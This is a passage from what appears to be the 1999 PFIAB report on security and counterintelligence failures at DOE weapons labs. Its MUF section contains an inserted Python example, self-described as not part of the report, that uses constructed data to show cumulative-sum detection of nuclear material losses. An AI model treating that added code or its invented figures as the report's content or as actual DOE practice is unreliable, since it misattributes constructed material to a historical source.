· A diverse workforce of military and civilian personnel; U.S. citizens and foreign nationals; career federal officials and part-time researchers; white collar bureaucrats as well as scientists and engineers specializing in narrow esoteric fields.
· Constituencies include the White House, Congress, the power industry, multinational defense and aerospace corporations, major universities, states and municipalities seeking or monitoring environmental cleanups.
_____________________________________

During 1978, its first year of operation within the new structure, DOE already had in place more than 9,500 prime contracts and more than 1,800 financial assistance awards, which together were spread among 188 universities and more than 3,200 contractors.
And the Department was growing: from 1977 to 1978, grants and contracts with university researchers posted an increase of 22 percent.7

LACK OF ACCOUNTABILITY

Depending on the issue at hand, a line worker in a DOE facility might be responsible to DOE headquarters in Washington, a manager in a field office in another state, a private contractor assigned to a DOE project, a research team leader from academia, or a lab director on another floor of the worker’s building. For example, prior to Secretary Richardson’s restructuring initiative earlier this year, a single laboratory, Sandia, was managed or accountable to nine different DOE security organizations. Last year, after years of reports highlighting the problem of confused lines of authority, DOE was still unable to ensure the effectiveness of security measures because of its inability to hold personnel accountable. A 1998 report lamented that “short of wholesale contract termination, there did not appear to be adequate penalty/reward systems to ensure effective day–to–day security oversight at the contractor level.”8 The problem is not only the diffuse nature of authority and accountability in the Department. It is the dynamic and often informal character of the authority that does exist. The inherently unpredictable outcomes of major experiments, the fluid missions of research teams, the mobility of individual researchers, the internal competition among laboratories, the ebb and flow of the academic community, the setting and onset of project deadlines, the cyclical nature of the federal budgeting process, and the shifting imperatives of energy and security policies dictated from the White House and Congress—all of these dynamic variables contribute to volatility in the Department’s workforce and an inability to give the weapons–related functions the priority they deserved.
Newcomers, as a result, have an exceedingly hard time when they are assimilated; incumbents have a hard time in trying to administer consistent policies; and outsiders have a hard time divining departmental performance and which leaders and factions are credible. Such problems are not new to government organizations, but DOE’s accountability vacuum has only exacerbated them. Management and security problems have recurred so frequently that they have resulted in nonstop reform initiatives, external reviews, and changes in policy direction. As one observer noted in Science magazine in 1994: “Every administration sets up a panel to review the national labs. The problem is that nothing is done.” The constant managerial turnover over the years has generated nearly continuous structural reorganizations and repeated security policy reversals. Over the last dozen years, DOE has averaged some kind of major departmental shake–up every two to three years. During that time, security and counterintelligence responsibilities have been “punted” from one office to the next.

CULTURE AND ATTITUDES

In the course of this inquiry, many officials interviewed by the PFIAB panel cited the scientific culture of the weapons laboratories as a factor that complicates, perhaps even undermines, the ability of the Department to consistently implement its security procedures. Although there seemed to be no universally accepted definition of the culture, nearly everyone agreed that it is distinct and pervasive. One facet of the culture mentioned more than others is an arrogance borne of the simple fact that nuclear researchers specialize in one of the world’s most advanced, challenging, and esoteric fields of knowledge. Nuclear physicists, by definition, are required to think in literally other dimensions not accessible to laymen.
Thus it is not surprising that they might bridle under the restraints and regulations of administrators and bureaucrats who do not entirely comprehend the precise nature of the operation being managed. Operating within a large, complex bureaucracy with transient leaders would only tend to accentuate a scientist’s sense of intellectual superiority: if administrators have little more than a vague sense of the contours of a research project, they are likely to have little basis to know which rules and regulations constitute unreasonable burdens on the researchers’ activities. With respect to at least some security issues, the potential for conflicts over priorities is obvious. For example, how are security officials to weigh the risks of unauthorized disclosures during international exchanges if they have only a general familiarity with the cryptic jargon used by the scientists who might participate?

The prevailing culture of the weapons labs is widely perceived as contributing to security and counterintelligence problems. At the very least, restoring public confidence in the ability of the labs to protect nuclear secrets will require a thorough reappraisal of the culture within them.

CHANGING TIMES, CHANGING MISSIONS

The external pressures placed on the Department of Energy in general, and the weapons labs in particular, are also worth noting. For more than 50 years, America’s nuclear researchers have operated in a maelstrom of shifting and often contradictory attitudes. In the immediate aftermath of World War II, nuclear discoveries were simultaneously hailed as a destructive scourge and a panacea for a wide array of mankind’s problems. The production of nuclear arms was regarded during the 1950s and 1960s as one of the best indices of international power and the strength of the nation’s military deterrent.
During the 1970s, the nation’s leadership turned to nuclear researchers for solutions to the energy crisis at the same time that the general public was becoming more alarmed about the nuclear buildup and the environmental implications of nuclear facilities. Over the past 20 years, some in Congress have repeatedly called for the dissolution of the Department of Energy, which has undoubtedly been a distraction to those trying to make long-term decisions affecting the scope and direction of the research at the labs. And in the aftermath of the Cold War, the Congress has looked to the nation’s nuclear weapons labs to help in stabilizing or dismantling nuclear stockpiles in other nations. Each time that the nation’s leadership has made a major change in the Department’s priorities or added another mission, it has placed additional pressure on a government agency already struggling to preserve and expand one of its most challenging historical roles: guarantor of the safety, security, and reliability of the nation’s nuclear weapons.

RECURRING VULNERABILITIES

Over the past 20 years, six DOE security issues have received the most scrutiny and criticism from both internal and external reviewers:

  - long-term security planning and policy implementation;
  - physical security over facilities and property;
  - screening and monitoring of personnel;
  - protection of classified and sensitive information, particularly information that is stored electronically in the Department’s computers;
  - accounting for nuclear materials; and
  - the foreign visitors’ programs.

MANAGEMENT AND PLANNING

Management of security and counterintelligence has suffered from chronic problems since the creation of the Department of Energy in 1977. During the past decade, the mismatch between DOE’s security programs and the severity of the threats faced by the Department grew more pronounced.
While the number of nations possessing, developing, or seeking weapons of mass destruction continued to rise, America’s reliance on foreign scientists and engineers dramatically increased, and warnings mounted about the espionage goals of other nations, DOE spending on safeguards and security decreased by roughly one-third.[1] The widening gap between the level of security and the severity of the threat resulted in cases where sensitive nuclear weapons information was certainly lost to espionage. In countless other instances, such information was left vulnerable to theft or duplication for long periods, and the extent to which these serious lapses may have damaged American security is incalculable. DOE’s failure to respond to warnings from its own analysts, much less independent sources, underscores the depth of its managerial weakness and inability to implement legitimate policies regarding well-founded threats.

_________________________________________

A Sample of Security Issues

MANAGEMENT AND PLANNING
  - Decentralized decisionmaking undermines consistency of policies.
  - Lack of control over the security budget has allowed diversion of funds to other priorities.
  - Department leaders with little experience in security and intelligence.
  - Lack of accountability.

PHYSICAL SECURITY
  - Training insufficient for some security personnel.
  - Nuclear materials stored in aging buildings not designed for containment purposes.
  - Recurring problems involving lost or stolen property.
  - Poor management results in unnecessary training and purchasing costs.

PERSONNEL SECURITY CLEARANCES
  - Extended lags in obtaining clearances, reinvestigating backgrounds, and terminating clearance privileges for former employees.
  - Some contractors not adequately investigated or subject to drug and substance abuse policies.
  - Lack of uniform procedures and accurate data.
  - Inadequate pre-employment screening.
  - More clearances granted than necessary.
PROTECTION OF CLASSIFIED INFORMATION
  - Poor labeling and tracking of computer media containing classified information.
  - Problems with lax enforcement of password policies.
  - Network, email, and Internet connections make transfer of large amounts of data easier.

ACCOUNTING FOR NUCLEAR MATERIALS
  - Chronic problems in devising and operating an accurate accounting system for tracking stocks and flows of nuclear materials.

FOREIGN VISITORS
  - Weak systems for tracking visits and screening backgrounds of visiting scientists.
  - Decentralization makes monitoring of discussions on sensitive topics difficult.

_________________________________________

During the mid-1980s, the predominant concern of DOE officials was improving the physical security of the nuclear weapons laboratories and plants. Following a January 1983 report[2] that outlined vulnerabilities of the weapons labs to terrorism, the Department embarked on a five-year program of construction and purchases that would see its overall safeguards and security budget roughly double and its spending on upgrades nearly triple. Included was money for additional guards, security training, helicopters, fortified guard towers, vehicle barriers, emergency planning, and advanced alarm systems.[3] Improving physical security in a wide array of nuclear weapons facilities, whose replacement value was an estimated $100 billion,[4] proved to be difficult. Reports through the late 1980s and early 1990s continued to highlight deficiencies in the management of physical security.

In the late 1980s, priorities began to shift somewhat. Listening devices were discovered in weapons-related facilities,[5] and a 1990 study advised the Department leadership of an intensifying threat from foreign espionage. Less and less able to rely on the former Soviet Union to supply technology and resources, an increasing number of states embarked on campaigns to bridge the economic and technological gap with the United States by developing indigenous capabilities in high technology areas.
The study noted that the freer movement of goods, services and information in a less hostile world “intensified the prospects and opportunities for espionage as missing pieces of critically needed information became more easily identified.”[6] An intelligence report further highlighted the changing foreign threat to the labs by noting that “new threats are emerging from nontraditional adversaries who target issues key to U.S. national security. DOE facilities and personnel remain priority targets for hostile intelligence collection.”[7] Anecdotal evidence corroborates, and intelligence assessments agree, that foreign powers stepped up targeting of DOE during the early 1990s. (See Classified Appendix.)

While this threat may have been taken seriously at the highest levels of the DOE, it was not uniform throughout the Department. A former FBI senior official noted in discussions with the PFIAB investigative panel that DOE lab scientists during these years appeared naive about the level of sophistication of the nontraditional threat posed by Chinese intelligence collection. The trend in openness to foreign visitors and visits does not indicate any sense of heightened wariness. A 1997 GAO report concluded that from mid-1988 to the mid-1990s, the number of foreign visitors to key weapons labs increased from 3,800 to 5,900 annually and sensitive country visitors increased from 500 to more than 1,600.[8] Meanwhile, the DOE budget for counterintelligence was in near-constant decline.

_________________________________________

How Long Does It Take?

Each year DOE security officials compile audits to identify security lapses and vulnerabilities in the facilities and procedures of the nuclear weapons laboratories and plants. The following year, they report on whether the problems have been addressed. Given the sensitivity of what was being protected—information about how to build, miniaturize, store, and maximize the destructiveness of nuclear weapons—the numbers logged in the audits are remarkable:

  11 months  A DOE employee was dead before Department officials realized four documents with CLASSIFIED and RESTRICTED DATA were still assigned to him.
  20 months  Before DOE officials could ensure that improperly stored classified computer media had been properly safeguarded.
  24 months  To order security labels (SECRET, TOP SECRET, etc.) for mislabeled software.
  31 months  That 2,750 out of 3,000 non-classified computer terminals were connected and being used on a classified network.
  31 months  To write and approve a network security plan.
  35 months  For DOE officials to write a work order to replace a lock at a weapons lab facility containing sensitive nuclear information.
  45 months  To correct a broken doorknob that was sticking in an open position and allowing access to sensitive areas.
  51 months  To correct a mistake that allowed secure telephone cryptographic materials to go improperly safeguarded.
   ? months  Before a security audit team discovered that the main telephone frame room door at a weapons lab had been forced open and the lock destroyed.

SOURCE: DEPT. OF ENERGY

_________________________________________

As noted in the previous chapter, federal officials in charge of oversight of nuclear weapons laboratories have historically allowed decisionmaking on basic aspects of security to be decentralized and diffuse. With their budget spread piecemeal throughout a number of offices, security and counterintelligence officials often found themselves with a weak voice in internal bureaucratic battles and an inability to muster the authority to accomplish their goals. Indeed, an excerpt from a history of the early years of the Atomic Energy Commission reads much like recent studies:

  Admiral Gingrich, who had just resigned as director of security [in 1949], had expressed to the Joint Committee [on Atomic Energy] a lack of confidence in the Commission’s security program.
  Gingrich complained that decentralization of administrative functions to the field offices had left him with little more than a staff function at headquarters; even there, he said, he did not control all the activities that seemed properly to belong to the director of security.[9]

More than 30 years later, decentralization still posed a problem for security managers. An internal DOE report in 1990 found that the Department lacked a comprehensive approach to management of threats and dissemination of information about them.[10] A DOE annual report in 1992 found that security “has suffered from a lack of management focus and inconsistent procedural execution throughout the DOE complex. The result is that personnel are seldom held responsible for their disregard, either intentional or unintentional, of security requirements.”[11]

The counterintelligence effort at DOE in the late 1980s and mid-1990s was in its infancy and grossly underfunded. Although the Department could have filled its gap in some areas, such as counterintelligence information, through cooperation with the broader intelligence community, PFIAB research and interviews indicate that DOE headquarters’ relationship with the FBI—the United States’ primary domestic CI organization—was strained at best. DOE requested an FBI agent detailee in 1988 to assist in developing a CI program, but the agent found that DOE failed to provide management support or access to senior DOE decisionmakers. A formal relationship with the FBI was apparently not established until 1992: a Memorandum of Understanding between the FBI and DOE on respective responsibilities concerning the coordination and conduct of CI activities in the United States.
However, in 1994 two FBI detailees assigned to DOE complained about their limited access and were pulled back to the FBI because of a “lack of control of the CI program by DOE headquarters which resulted in futile attempts to better manage the issue of foreign visitors at the laboratories.”[12]

________________________________

We asked a number of DOE officials to whom they report, to whom they were responsible. Invariably, their answer was: “It depends.”

________________________________

The haphazard assortment of agencies and missions folded into DOE has become so confusing as to become a running joke within the institution. In the course of the panel’s research and interviews, rare were the senior officials who expressed any sort of confidence in their understanding of the extent of the agency’s operations, facilities, or procedures. Time and again, PFIAB panel members posed the elementary questions to senior DOE officials. To whom do you report? To whom are you accountable? The answer, invariably, was: “It depends.”

DOE’s relationship with the broader intelligence community was not well-defined until the mid-1990s. Coordination between DOE CI elements and the broader intelligence community, according to a 1992 intelligence report, was hampered from the 1980s through the early 1990s by DOE managers’ inadequate understanding of the intelligence community.[13] The Department did not become a core member of the National Counterintelligence Policy Board (established in 1994 under PDD-24) until 1997. Over much of the past decade, rather than a heightened sensitivity to espionage threats recognized widely throughout the intelligence community, DOE lab officials have operated in an environment that allowed them to be sanguine, if not skeptical.
Numerous DOE officials interviewed by the PFIAB panel stated that they believed that the threat perception was weakened further during the administration of Secretary O’Leary, who advanced the labs’ openness policies and downgraded security as an issue by terminating some security programs instituted by her predecessor. Even when the CI budget was expanded in the late 1990s, the expenditures fell short of the projected increases. In Fiscal Year 1997, for example, DOE’s CI budget was $3.7 million, but the actual expenditures on CI were only two-thirds of that level, $2.3 million. Shortly before the 1997 GAO and FBI reports on DOE’s counterintelligence posture were issued, DOE began instituting changes to beef up its counterintelligence and foreign intelligence analytic capabilities.[14]

When DOE did devote its considerable resources to security, it too often faltered in implementation. A report to the Secretary in January 1994 noted “growing confusion within the Department with respect to Headquarters’ guidance for safeguards and security. At this time, there is no single office at Headquarters responsible for the safeguards and security program. Most recently, a number of program offices have substantially expanded their safeguards and security staff to office-size organizations. These multiple safeguards and security offices have resulted in duplication of guidance, unnecessary requests for information and clarification, and inefficient program execution. Unchecked, this counterproductive tendency threatens the success of the overall safeguards and security effort.”[15]

A 1996 DOE Inspector General report found that security personnel at the weapons programs had purchased and stockpiled far more firepower—ranging from handguns and rifles to submachine guns and grenade launchers—than could ever be used in an actual emergency. The Oak Ridge facilities had more than three weapons per armed security officer—on and off duty.
Los Alamos National Laboratory had more than four.[16]

____________________________________

Foreign agents could probably not shoot their way into U.S. weapons laboratories. But they could apply for an access pass to walk in and strike up a conversation.

____________________________________

Around the same time, GAO security audits of the research laboratories at these sites found lax procedures for issuing access passes to secure areas, inadequate prescreening of the more than 1,500 visitors from sensitive countries that visited the weapons laboratories annually, and poor tracking of the content of discussions with foreign visitors. The implication: foreign agents could probably not shoot their way past the concertina wires and bolted doors to seize secrets from U.S. weapons laboratories, but they would not need to do so. They could probably apply for an access pass, walk in the front door, and strike up a conversation.

PHYSICAL SECURITY

The physical security of the Department of Energy’s weapons-related programs is roughly divided into two essential functions: tracking and control over the property and equipment within the weapons-related laboratories, and keeping unwarranted intruders out, often referred to as the realm of “guns, guards, and gates.” The general approach to security, of course, was defined by the emphasis on secrecy associated with the nuclear weapons program during World War II. Los Alamos National Laboratory was created as a “closed city”—a community with a high degree of self-sufficiency, clearly defined and protected boundaries, and a minimum of ingress from and egress to the outer world. Although the community is no longer “closed,” the weapons laboratories at Los Alamos, like those at the other national laboratories, still retain formidable physical protections and barriers.
In examining the history of the laboratories, the panel found only a few instances where an outsider could successfully penetrate the grounds of an operation by destruction of a physical safeguard or direct violent assault.

__________________________________

Clearances to secure DOE areas have been granted simply for convenience, such as to reduce the length of an employee’s walk from the car to the office each morning.

__________________________________

In visits to several of the weapons laboratories, the members of the Special Investigative Panel were impressed by the great amount of attention and investment devoted to perimeter control, weaponry, and security of building entrances and exits. Indeed, one cannot help but be struck by the forbidding and formidable garrison-type atmosphere that is prevalent at many of the facilities: barbed wire, chain-link fences, electronic sensors, and surveillance cameras. Further, the panel recognizes that the labs themselves have developed and produced some of the most sophisticated technical security devices in the world. Nonetheless, DOE reports and external reviews since at least 1984 have continued to raise concerns about aging security systems.[17]

Management of the secure environments at the laboratories has posed more serious problems. As noted earlier, DOE may be spending too much money in some areas, buying more weapons than could conceivably be used in an emergency situation. In other cases, it may be spending too little. Budget cuts in the early and mid-1990s led to 40 to 50 percent declines in officer strength and over-reliance on local law enforcement.
Resources became so low that normal protective force operations required “the use of overtime scheduling to accomplish routine site protection.”[18] GAO has found an assortment of problems at Los Alamos over the past decade: security personnel failed basic tests in such tasks as firing weapons, using a baton, or handcuffing a suspect, and inaccurate and incomplete records were kept on security training.[19]

Other DOE facilities have had substantial problems in management of physical property. In 1990, Lawrence Livermore Laboratory could not account for 16 percent of its inventory of government equipment, acquired at a cost of $18.6 million.[20] In 1993, DOE sold 57 components of nuclear reprocessing equipment and associated documents, including blueprints, to an Idaho salvage dealer. Much of what was sold was subsequently found to be potentially useful to any nation attempting to develop or advance its own reprocessing operation.[21] Following a GAO report in 1994, which found that the Rocky Flats facility was unable to account for large pieces of equipment such as forklifts and a semitrailer, some $21 million in inventory was written off.[22] DOE had begun to consolidate its growing stockpile of sensitive nuclear material by 1992, but a 1997 DOE report to the Secretary found that significant quantities of the material “remain in aging buildings and structures, ranging in age from 12 to 50 years, that were never intended for use as storage facilities for extended periods.”[23]

SCREENING AND MONITORING OF PERSONNEL

Insider threats to security have been a chronic problem at the nation’s weapons laboratories. From the earliest years, the importance of the labs’ missions and their decentralized structure have had an uneasy coexistence with the need for thorough background investigations of researchers and personnel needing access to sensitive areas and information.
In 1947, the incoming director of security for the AEC was greeted with a backlog of more than 13,000 background investigations and a process where clearances had been dispersed to field offices that operated with few formal guidelines.[24] Forty years later, GAO found that the backlog of personnel security investigations had increased more than nine-fold, to more than 120,000. Moreover, many clearances recorded as valid in the Department’s records should have been terminated years before.[25]

____________________________________

Even after DOE discovered listening devices in some of its weapons laboratories, security audits found that thousands of “Q” clearances were being given to inappropriate personnel.[26]

____________________________________

The research of the PFIAB panel found that problems with personnel security clearances, while mitigated in some aspects, have persisted to an alarming degree. From the mid-1980s through the mid-1990s, the DOE Inspector General repeatedly warned Department officials that personnel were receiving clearances that were much higher than warranted and that outdated clearances were not being withdrawn on a timely basis. The issue became more urgent with the discovery of a clandestine surveillance device at a nuclear facility.[27] But problems persisted. DOE Inspector General reports in 1990 and 1991 found that one of the weapons laboratories had granted “Q” clearances (which provide access to U.S. government nuclear weapons data) to more than 2,000 employees who did not need access to classified information.[28] A 1992 report to the Secretary of Energy noted that “DOE grants clearances requested by its three major defense program sponsored labs based on lab policies to clear all employees regardless of whether actual access to classified interests is required for job performance.”[29] Three years later, a review of personnel security informed the Secretary there were “individuals who held security clearances for convenience only and limited security clearances to those individuals requiring direct access to classified matter or [special nuclear materials] to perform official duties.”[30]

More recent evidence is no more reassuring. A counterintelligence investigation at a nuclear facility discovered that the subject of an inquiry had been granted a “Q” clearance simply to avoid the delay caused by the normal processing of a visit.[31] That same year, an illegal telephone wiretap was discovered at the same lab. The employee who installed it confessed, but was not prosecuted by the government.[32]

PROTECTION OF CLASSIFIED AND SENSITIVE INFORMATION

Two vulnerabilities regarding classified and sensitive information at DOE have recurred repeatedly throughout the past 20 years: inappropriate release of classified information, either directly through inadvertence or indirectly through improper declassification; and the increasing mobility of classified and sensitive information through electronic media, such as computers. As computers have progressed from the large mainframes of the 1950s and 1960s to desktop models in the 1980s and decentralized networks in the 1990s, it has become progressively easier for individuals to retrieve and transport large amounts of data from one location to another. This has presented an obvious problem for secure environments.
GAO found in 1991 that DOE inspections revealed more than 220 security weaknesses in computer systems across 16 facilities. Examples included a lack of management plans, inadequate access controls, and failures to test for compliance with security procedures.[33] As a 1996 DOE report to the President said, “adversaries no longer have to scale a fence, defeat sensors, or bypass armed guards to steal nuclear or leading-edge ‘know-how’ or to shut down our critical infrastructure. They merely have to defeat the less ominous obstacles of cyber-defense.”[34]

_____________________________________

Computer systems at some DOE facilities were so easy to access that even Department analysts likened them to “automatic teller machines, [allowing] unauthorized withdrawals at our nation’s expense.”

_____________________________________

DOE’s cyber-defenses were, in fact, found to be “less ominous obstacles.” In 1994, an internal DOE review found that despite security improvement “users of unclassified computers continue to compromise classified information due to ongoing inadequacies in user awareness training, adherence to procedures, enforcement of security policies, and DOE and [lab] line management oversight.”[35] Also in 1994, a report to the Energy Secretary cited five areas of concern: “failure to properly accredit systems processing classified information, lack of controls to provide access authorities and proper password management; no configuration management; improper labeling of magnetic media; and failure to perform management reviews.”[36] Apparently, the warnings were to no avail.
A year later, the annual report to the Secretary noted: “Overall, findings and surveys, much like last year, continue to reflect deficiencies in self-inspections and procedural requirements or inappropriate or inadequate site guidance … In the area of classified matter protection and control, like last year, marking, accountability, protection, and storage deficiencies are most numerous.”[37]

Some reports made extra efforts to puncture through the fog of bureaucratic language. A 1995 report to the President said: “By placing sensitive information on information systems, we increase the likelihood that inimicable interests, external and internal, will treat those systems as virtual automatic teller machines, making unauthorized withdrawals at our nation’s expenses.” Indeed, a report found security breaches at one of the major weapons facilities in which documents with unclassified but sensitive information “were found to be stored on systems that were readily accessible to anyone with Internet access.”[38] In other instances, personnel were found to be sending classified information to outsiders via an unclassified email system.[39]

_____________________________________

Ahead of its Time

In 1986, the DOE Office of Safeguards and Quality Assessment issued an inspection report on a weapons lab that warned of shortcomings in computer security and noted that the “ability of [a] user to deliberately declassify a classified file without detection and move classified information from the secure partition to the open partition can be made available to any authorized user either on or off site.”[40] The warning turned out to be on the mark. In April of this year, Energy Secretary Bill Richardson issued a statement: “While I cannot comment on the specifics, I can confirm that classified nuclear weapons computer codes at Los Alamos were transferred to an unclassified computer system. This kind of egregious security breach is absolutely unacceptable ...”

_____________________________________

Even though the hard evidence points to only sporadic penetrations of the labs by foreign intelligence services (see classified appendix), volumes of sensitive and classified information may have been lost over the years—via discarded or purloined documents; uninformed and often improperly vetted employees; and a maze of uncontrolled computer links. In one recent case discovered by PFIAB, lab officials initially refused to rectify a security vulnerability because “no probability is assigned to [a loss of sensitive information], just the allegation that it is possible.”[41] As recently as last year’s annual DOE report to the President, security analysts were finding “numerous incidents of classified information being placed on unclassified systems, including several since the development of a corrective action plan in July 1998.”[42]

TRACKING OF NUCLEAR MATERIALS: HOW MUCH MUF?

MUF stands for “materials unaccounted for,” the official term used until the late 1970s for discrepancies in the amount of nuclear materials that can be physically located in inventory versus the amount noted in Department records. MUF (now termed with the more politic phrase “inventory differences”) has been a recurring concern—and debate—in the nuclear research field since the beginning. The question at the center of the debate: if large quantities of nuclear material are impossible to measure with absolute precision, what constitutes a significant loss? As in many questions, the answer depends on whom you ask. Officials of nuclear research facilities have argued that the scale and complexity of the processing and handling of nuclear material inevitably result in losses that are detectable but inconsequential. Outside observers have tended to be less sanguine about what constitutes a significant loss from a security standpoint.
In 1976, the General Accounting Office reported that the Nuclear Regulatory Commission and the Energy Research and Development Administration (DOE’s predecessor) could not account for 8,000 pounds of highly enriched uranium and plutonium. Officials of the two agencies responded that part of the accounting discrepancy could be ascribed to the statistical margin of error in their measuring equipment; the rest was probably dregs created during processing and left in machinery parts, wiping cloths, and scrap items.[43] Critics of the agencies have pointed out that thieves could easily use the variance in statistical measures to cover their tracks, stealing an increment during each measuring period that falls just within the margin of error. They have also pointed out that if Department records are not accurate, it is impossible for anyone to estimate the stock of nuclear material at any given point, much less the difference between two levels as it proceeds from one stage of the nuclear cycle to the next.

In December 1994, the Department released updated figures for the cumulative amount of MUF or inventory difference for the 50-year period beginning in 1944. The cumulative figure: 6,174 pounds. Of that amount, a cumulative total of about 10 pounds was ascribed to “accidental losses” and “approved write-offs.”[44]

GAO has continued to highlight the issue since DOE has become the steward of the nation’s nuclear weapons laboratories. GAO published a report in 1991 criticizing the insufficiency of the Department’s measuring systems and handling procedures;[45] in 1994, criticizing its methods of tracking exported nuclear material;[46] and in 1995, for installing a new system that was allegedly faulty.[47] Even if accurate systems of measurement and accounting had been in place, it is not clear whether DOE officials would have been qualified to manage them effectively.
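The critics' point above (a loss that stays inside the measurement margin every period is invisible to a per-period check, yet accumulates) is exactly what cumulative-sum monitoring of inventory differences is designed to catch. The Python below is an added illustration, not part of the PFIAB report and not DOE's accounting method: the two inventory-difference series, the measurement uncertainty SIGMA, and the CUSUM parameters are constructed values, and the detector is a textbook one-sided Page CUSUM run over them.

```python
"""Cumulative-sum (CUSUM) monitoring of inventory differences (ID).

Added example; not from the PFIAB report or any DOE system. Sign
convention: a positive ID means book inventory exceeds physical inventory,
i.e. material is missing. SIGMA, thresholds and both series are constructed.
"""
from typing import Dict, List, Tuple

SIGMA = 1.0                      # measurement uncertainty of one period's balance (constructed units)
PER_PERIOD_LIMIT = 2.0 * SIGMA   # single-period check: |ID| beyond this is investigated
CUSUM_SLACK = 0.5 * SIGMA        # reference value k: only a bias above it accumulates
CUSUM_THRESHOLD = 4.0 * SIGMA    # decision interval h for the cumulative statistic

# Constructed measurement noise for an honest site: every value is well inside
# the per-period limit and the values roughly cancel over time.
HONEST_SITE = [0.8, -1.1, 0.3, -0.6, 0.9, -0.9, 0.4, -0.2, 0.7, -1.0, 0.5, -0.4]

# Constructed series for a site where one SIGMA of material is removed every
# period on top of the same noise. No single ID exceeds the per-period limit,
# which is the "just within the margin of error" pattern the critics describe.
DIVERTING_SITE = [x + 1.0 for x in HONEST_SITE]


def per_period_alarms(ids: List[float]) -> List[int]:
    """Indices of periods whose own ID exceeds PER_PERIOD_LIMIT."""
    return [i for i, x in enumerate(ids) if abs(x) > PER_PERIOD_LIMIT]


def cusum_alarm(ids: List[float]) -> Tuple[int, List[float]]:
    """One-sided Page CUSUM in the loss direction.

    S_0 = 0 and S_i = max(0, S_{i-1} + ID_i - k); an alarm is raised the
    first time S_i exceeds h. Returns (index of first alarm or -1, trace).
    """
    s = 0.0
    trace: List[float] = []
    first_alarm = -1
    for i, x in enumerate(ids):
        s = max(0.0, s + x - CUSUM_SLACK)
        trace.append(s)
        if first_alarm < 0 and s > CUSUM_THRESHOLD:
            first_alarm = i
    return first_alarm, trace


def cumulative_difference(ids: List[float]) -> float:
    """Plain running total of ID, the figure DOE reported as cumulative MUF."""
    return round(sum(ids), 6)


def assess(ids: List[float]) -> Dict[str, object]:
    """Summarise what each check would have reported for one series."""
    alarm_at, trace = cusum_alarm(ids)
    return {
        "per_period_alarms": per_period_alarms(ids),
        "cusum_alarm_period": alarm_at,
        "cusum_peak": round(max(trace), 6),
        "cumulative_id": cumulative_difference(ids),
    }


if __name__ == "__main__":
    for name, series in (("honest site", HONEST_SITE),
                         ("diverting site", DIVERTING_SITE)):
        print(name, assess(series))
```

Both constructed series pass the per-period check. Only the cumulative statistic separates them: it stays under half a SIGMA for the honest site and crosses the decision interval at period 8 for the diverting one, while the plain running total there has reached about eleven units. The slack k and interval h trade detection delay against false alarms on the honest series; the values here are constructed for the illustration, not DOE's.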
A 1995 report to the President warned that “severe budget reductions, diminished technical resources, increased responsibilities, and reduced mission training ... have undermined protection of special nuclear material and restricted data.”48 Last year, a report by an external review panel found “a lack of nuclear physical security expertise at all levels in the oversight process; ad hoc structuring of safeguards and security functions throughout the Department, and placement of oversight functions in positions which constrain their effectiveness.”49

The dispute over the accuracy of nuclear measurements, of course, is beyond the technical capabilities of this panel to resolve. But the panel members do believe that its persistence and the low priority given to the issue relative to other DOE scientific goals is indicative of the institutional attitude that DOE has had toward security: nonscientists have a poor understanding of all things nuclear, so their judgments about acceptable levels of risk are suspect prima facie.

FOREIGN VISITORS AND ASSIGNMENTS PROGRAM

True to the tradition of international partnership molded by the experiences of the Manhattan Project, the weapons labs have remained a reservoir of the best international scientific talent. Recent examples abound: a supercomputing team from Oak Ridge National Lab, made up of three PRC citizens and a Hungarian, recently won the Gordon Bell Prize; a Bulgarian and a Canadian, both world-class scientists, are helping Lawrence Livermore National Lab solve problems in fluid dynamics; a Spanish scientist, also at Livermore, is collaborating with colleagues on laser propagation.

But for more than a decade, the increasing prominence of foreign visitors in the weapons labs has increased concern about security risks. The PFIAB panel found that as early as 1985, the DCI raised concerns about the foreign visitors’ program with the Energy Secretary.
A year later, researchers conducting an internal DOE review could find only scant data on the number and composition of foreign nationals at the weapons labs. Although intelligence officials drafted suggestions for DOE’s foreign visitor control program, PFIAB found little evidence of reform efforts until the tenure of Secretary Watkins. A 1988 GAO report cited DOE for failing “to obtain timely and adequate information on foreign visitors before allowing them access to the laboratories.” The GAO found three cases where DOE allowed visitors with questionable backgrounds—possible foreign agents—access to the labs. In addition, the GAO found that about 10 percent of 637 visitors from sensitive countries were associated with foreign organizations suspected of conducting nuclear weapons activities, but DOE did not request background data on them prior to their visit. DOE also had not conducted its own review of the visit and assignment program at the weapons labs despite the DOE requirement to conduct audits or reviews at a minimum of every five years. Moreover, GAO reported that few post–visit or host reports required by DOE Order 12402 were submitted within 30 days of the visitors’ departure and some were never completed.50

The following year, DOE revised its foreign visitor policy and commissioned an external study on the extent and significance of the foreign visitor problem. DOE’s effort to track and vet visitors, however, still lagged well behind the expansion of the visitor program, allowing foreigners with suspicious backgrounds to gain access to weapons facilities. A study published in June 1990 indicated DOE had a “crippling lack of essential data, most notably no centralized, retrievable listing of foreign national visitors to government facilities.”51 By September 1992, DOE had instituted Visitor Assignment Management System (VAMS) databases, used to track visitors and assignees requesting to visit DOE.
The system, however, failed to provide links between the labs that could be used for CI analysis and cross-checking of prospective visitors. Moreover, labs frequently did not even use the database and failed to enter visitor information. Instead, each lab developed its own computer program independently.

Reviews of security determined that, despite an increase of more than 50 percent in foreign visits to the labs from the mid–1980s to the mid–1990s, DOE controls on foreign visitors actually weakened in two critical areas: screening for visitors that may pose security risks, and monitoring the content of discussions that might touch on classified information. In 1994, DOE headquarters delegated greater authority to approve nonsensitive country visitors to the laboratories, approving a partial exception for Los Alamos and Sandia National Laboratories to forego background checks to help “reduce costs and processing backlogs.” This resulted in almost automatic approval of some foreign visitors and fewer background checks. The FBI and GAO subsequently found that “questionable visitors, including suspected foreign intelligence agents, had access to the laboratories without DOE and/or laboratory officials’ advance knowledge of the visitors’ backgrounds.”52

Changes in records checks over the past decade also made it easier for individuals from sensitive countries to gain access to the laboratories. In 1988, for example, all visitors from Communist countries required records checks regardless of the purpose of the visit. By 1996, records checks were only required for visitors from sensitive countries who visited secure areas or discussed sensitive subjects. An internal DOE task force in 1996 determined that the Department’s definitions of sensitive topics were not specific enough to be useful. It directed the DOE office of intelligence to develop a new methodology for defining sensitive topics, but did not set a due date.
